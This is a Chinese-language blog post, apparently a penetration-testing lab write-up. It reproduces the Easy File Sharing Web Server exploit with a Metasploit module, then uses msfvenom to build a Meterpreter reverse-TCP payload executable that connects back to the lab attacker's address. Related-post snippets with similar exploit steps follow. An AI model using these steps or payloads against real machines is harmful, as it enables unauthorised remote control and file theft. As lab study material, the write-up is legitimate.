easy file sharing web server 复现 + msf被控端与主控端使用

已于 2023-12-20 11:17:02 修改
阅读量534 收藏 9
点赞数 9
分类专栏: 渗透测试学习 文章标签: 测试工具 web安全 安全
于 2023-12-20 11:15:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wrplayer/article/details/135103473
版权

easy file sharing web server 复现

攻击机:192.168.232.133

靶机:192.168.232.136

1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。

2、利用Nmap扫描发现靶机(Windows)运行了该服务。

这里使用Msf利用该漏洞,选择使用 exploit/windows/http/easyfilesharing_seh 这个攻击模块

设置好目标即可执行,成功

执行shell和whoami之后可以查看当前权限为管理员

使用calc命令即可弹计算器

Metasploit被控端与主控端的使用

攻击机:192.168.232.133

靶机:192.168.232.136

  1. 生成被控端

使用命令msfvenom -p windows/meterpreter/reverse_tcp

lhost=192.168.232.133 lport=5000 -f exe -o Desktop/payload.exe

  1. 生成主控端

依次执行命令

被控端放入靶机并双击执行

链接成功

尝试弹计算机

成功

退出命令行后使用download下载efssetup_20181文件,成功

hhhalloWelt
关注
专栏目录
Easy File Sharing Web Server 缓冲区溢出漏洞
qq_55857040的博客
12-14 2225
目录 漏洞介绍 环境准备 复现过程 一、环境搭建 二、漏洞利用 利用漏洞 利用metasploit进行漏洞利用 在kali打开msf控制台 ​ 输入命令,寻找找到EasyFileSharing漏洞的利用模块 小结 漏洞介绍 由于Easy File Sharing Web Server 6.9这个程序对输入的用户名长度不进行校验,存在缓冲区溢出漏洞,导致当用户输入太长的用户名导致缓冲区溢出,覆盖程序原本的返回地址,导致程序因跳转到非法地址奔溃或跳转到黑客控制的恶意代码地址进...
如何使用msfvenom生成被控并进行远程控制
Hotumn的博客
06-26 521
Kali Linux2中提供了一个名为MSFPC(MSFvenom Payload Creator)的工具,它其实是MSFvenom的优化版,使用起来更简单,利用这个工具就可以轻松地生成各种系统的远程控制被控。在KaliLinux2中提供了多个可以用来生成远程控制被控的命令,其中较为简单且强大的命令为msfvenom命令,MSFPC命令其实也是经过包装的msfvenom命令。msfvenom命令是渗透测试工具Metasploit中的一个命令,但是我们可以直接在。
最好的web文件分享工具Easy File Sharing Web Server
05-26
Easy File Sharing Web Server允许用户不需要任何附加的软件或服务就可以架设一个安全的、基于网页的P2P文件分享、传输系统。 除了HTML网页界面设计,Easy File Sharing Web Server还可以让你直接在自己的PC上快速架起一个网站,你可以用它来和朋友们分享照片、音乐、视频,还可以让其它用户通过一个简单的网页界面上传自己的收藏到你的PC伤,真正达到分享资源的目的。
easy file sharing server
qq_74398661的博客
12-28 497
做一下这个漏洞复现1.在kali 和Windows这两台虚拟机上做并且是以NAT模式连接在同一网络2.先在Windows7虚拟机中安装easy file sharing server安装之后会出现以下界面,选择try it可知http服务用的口为80,服务器ip=192.168.110.130接下来使用kali用nmap工具扫描上面的IP 192.168.110.130查看各开放使用的服务名称和版本号80口和443口80口开放利用漏洞在kali中访问存在漏洞的服务口。
Easy File Sharing Web Server 漏洞的简单利用
qq_51302564的博客
12-15 1218
Easy File Sharing Web Server 漏洞的简单利用 个人博客:https://fly-pluche.github.io/posts/Easy%20File%20Sharing%20Web%20Server/ 背景 EFS Easy File Sharing (EFS) Web Server是荷兰EFS Software公司的一套集论坛网站,文件上传、下载、共享和图片共享等功能的文件共享软件。 EFS EFS Web Server 7.2版本中存在基于栈的缓冲区溢出漏洞。远程攻击者
Easy file sharing server靶机测试
weixin_54584489的博客
11-14 3674
安装靶机easy file sharing web server 并将port改为8000,按下restart建; 从该靶机界面可知其ip地址为192.168.202.1; 打开kali用nmap扫描一下该ip地址; 从扫描结果可知运行在靶机Easy file sharing web server 上的8000口确实打开了; 接着利用searchsploit查看靶机存在的漏洞; 右边是测试脚本,左边是漏洞类型,随机选一个漏洞和对应的脚本进行测试 回车 我们会发现...
easy file sharing server漏洞渗透测试及Metasploit应用
zzzfff__的博客
11-06 508
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞,使得靶机运行计算器。
6.4-5 msf被控主控
weixin_70294597的博客
06-08 201
远程控制是一个常见计算机术语,指的就是可以在一台设备上操纵另一台设备的软件。通常情况下,远程控制分为两个部分,即被控主控,一台计算机被植入被控,他就会被另一台装有主控的计算机所控制。
使用msfvenom生成被控并进行远程控制
Z_3679的博客
07-01 459
使用-p使用LHOST和LPORT选项指定攻击者的IP地址和使用-fexeapkphpraw使用-o选项指定输出文件的路径和名称使用RHOST和RPORT选项指定目标的IP地址和口其他选项根据不同payload类型而有所不同使用-e使用--list选项列出可用的payload、编码器、nop等模块使用--help选项获取帮助信息使用-n选项关闭payload的后门。
MSF漏洞复现
mackilo的博客
11-08 8476
ms10-018漏洞,它是IE浏览器漏洞,可以通过该漏洞获取目标主机的控制权。最严重的漏洞可能在用户使用IE浏览器查看特制网页时允许执行远程代码。详细信息。
远程控制(easy file sharing web server)验证性实验
qq_45538874的博客
11-02 504
实验过程 首先在电脑上打开easy file sharing web server 并设置好口 进入kali中扫描该软件的漏洞 此时,利用39009溢出漏洞进行验证性实验。进入kali中,输入python /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.127.1 8000 此时,kali中的渗透模块就会连接到192.168.127.1的8000口,并将指定代码发送过去 执行完成后,easy file sharing we
easy file sharing server 漏洞复现
cheng___yu_的博客
12-14 3289
一、漏洞详情 Easy File Sharing FTP Server 是一款 FTP 服务程序。 Easy File Sharing FTP Server 处理 PASS 命令存在问题,远程攻击者可以利用漏洞进行缓冲区溢出攻击,可能以进程权限执行任意指令。 提交超长字符串作为 PASS 命令参数,可导致触发缓冲区溢出,精心构建提交数据可能以进程权限执行任意指令 二、工具 靶机: 192.168.118.132、win10(把 windows 安全中心关闭)、安装 easy file sharing s
Easy File Sharing Server漏洞利用
D000o11的博客
12-03 3077
首先我们用windows系统虚拟机作为靶机并运行easy file sharing server 然后,我们用nmap -sV IP靶机地址扫描口,可以看到79口运行了easy file sharing server httpd 6.9: 使用searchsploit Easy File Sharing Web Server寻找可以利用的漏洞脚本。 我们在此使用39009.py文件,用这个漏洞打开靶机上的计算器软件: 可以看到靶机上的计算机已经打开,而且easy f...
网络渗透测试复现任务easy file sharing server
m0_74897691的博客
01-02 426
2.将efssetup_2018.zip直接拖进Windows server 2016解压并安装,一直next即可,安装路径可以自己选择,安装成功后直接Try it!5.使用nmap -sV 192.168.239.134进行扫描(这里可能是由于Windows sever 2016安装时的配置问题或是口设置问题,没有扫成功)(一)靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。(一)生成主控被控
Easy File Sharing Web Server漏洞复现
最新发布
m0_73952621的博客
01-03 414
4、在kali中执行python2 /usr/share/exploitdb/exploits/windows/remote/39009.py 192.168.228.57 8080。1、在靶机(Win2003)中安装easy file sharing server口改为8080,URL为靶机ip。1、利用Nmap扫描发现靶机(Windows)运行了该服务。2、在kali中用nmap -sV扫描靶机IP。2、利用该漏洞,使得靶机运行计算器。打开靶机即可看到计算器被调用了。1、win2003靶机。
Easy File Sharing Web Server漏洞复现任务和Metasploit应用
hjhwdwdw的博客
12-26 607
实验环境:win7靶机,kali。
复现任务A
weixin_62599268的博客
11-19 198
网络渗透测试——复现任务
windows渗透测试
Aluxian_的博客
05-25 9393
假设您是一名网络安全工程师,需要对某公司的公司进行黑盒测试,分析windows操作系统有什么漏洞并提出解决方案。 1.通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行系统服务及版本扫描渗透测试,并将该操作显示结果中8080口对应的服务版本信息字符串作为Flag值提交; 使用nmap -sV -n 靶机IP flag:Microsoft IIS httpd 5.1 1.2. 通过本地PC中渗透测试平台Kali2.0对服务器场景Windows2020进行渗透测
easy file sharing server-漏洞的简单利用
weixin_44912169的博客
04-08 2279
easy file sharing server-漏洞的简单利用 1.win7靶机安装easy file sharing server 将efssetup_2018.zip解压安装到win7虚拟机中,然后将port改为8000然后点击restart即可,如下图 2.使用nmap扫描主机 nmap -sV -A -o easy-file.txt 192.168.126.132 -sV 服务版本...
Web渗透面试精华:MSF与Burp工具详解与信息收集策略
Web渗透测试面试集锦中,主要关注两个核心部分:MSF(Metasploit Framework)和Burp Suite的使用,以及渗透测试中的信息收集与漏洞扫描策略。 1. MSF与Burp Suite相关问题: - Burp Suite 是一款强大的Web应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hhhalloWelt

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值